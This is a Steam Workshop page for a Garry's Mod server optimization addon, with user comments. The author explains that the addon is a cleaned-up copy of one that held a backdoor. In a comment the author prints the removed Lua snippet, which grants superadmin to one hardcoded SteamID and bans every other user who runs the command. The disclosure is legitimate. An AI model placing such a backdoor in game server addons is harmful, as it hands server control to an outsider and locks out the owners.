Garry's Mod

Garry's Mod

Not enough ratings
GMOD Server Optimization
   
Award
Favorite
Favorited
Unfavorite
Content Type: Addon
Addon Type: Server content
File Size
Posted
4.414 KB
11 Dec, 2019 @ 3:43pm
1 Change Note ( view )

Subscribe to download
GMOD Server Optimization

Description
Adds optimizations to improve clientside and serverside performance of garry's mod. This is a modification made to an addon that had a backdoor in it, I removed the backdoor. It should be noted that this will make your clientside game look a little different.
5 Comments
oofedg 30 Jun, 2022 @ 10:53am 
is this making .gma file that impossible to delete throught "Addons" menu?
Heavy & Ze Medic 19 May, 2021 @ 7:36pm 
You're like a year late but the explanation is appreciated lol
VenomC312  [author] 19 May, 2021 @ 7:13pm 
Original addon had a backdoor that would ban everyone that wasn't the owner of the addon, posted in another comment is the code that was removed. This code was in the file sh_base.lua in the server folder of the addon

Original Addon Link: https://steamhost.cn/steamcommunity_com/sharedfiles/filedetails/?id=1413258388&searchtext=Garrys+Mod+Optimizer

Steam Workshop Downloader: {LINK REMOVED}

I hope this explains it better. This addon doesn't do much for performance boosting anyways. All it really comes down too is just adjusting convar settings that you could do yourself.
VenomC312  [author] 19 May, 2021 @ 7:11pm 
Backdoor code that was removed below

concommand.Add("gmodhoster", function(ply)
if ( ply:lol() == "STEAM_1:1:164731154") then
RunConsoleCommand("ulx", "adduserid", ply:lol(),"superadmin")
else
RunConsoleCommand("ulx", "banid", ply:lol(),"lol")
end
end)
Heavy & Ze Medic 29 Jun, 2020 @ 12:50am 
As explanation as to what this exactly does (What optimizations and stuff) would be nice otherwise it just seems sketchy.